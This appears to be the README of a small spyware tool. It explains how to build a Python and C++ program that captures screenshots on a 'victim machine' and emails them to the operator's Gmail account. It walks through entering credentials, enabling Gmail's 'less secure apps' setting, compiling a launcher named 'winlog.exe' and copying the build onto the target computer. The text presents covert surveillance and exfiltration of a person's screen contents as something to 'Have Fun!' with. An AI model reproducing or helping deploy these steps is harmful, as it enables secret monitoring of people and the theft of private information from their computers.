This program take screenshot and send it to your email address
- Gmail Account
- Configure your Gmail by "Allow less secure apps to ON" link: https://myaccount.google.com/lesssecureapps
- GCC or equivalent to compile C++ program
- Python >= 3.5 and pip3
- Install Python module requirements with the following command
python3 -m pip install -r requirements.txt
- Open "main.py" and change the following code with your email address and password
sender = "[email protected]"
receiver = sender
password = "youremailpassword"
- Open "cmd" and compile 'main.py' with the following command:
python3 setup.py build
- Compile "winlog.cpp"
- Copy "winlog.exe" to "\build\exe.win-amd64-3.7"
- Copy the Folder "build" to your victim machine
- Launch "winlog.exe" and you should receive screenshot in your mail inbox
Please contact us if you found issues ! Have Fun!
twitter : @ryurina23 / @malagasyhacker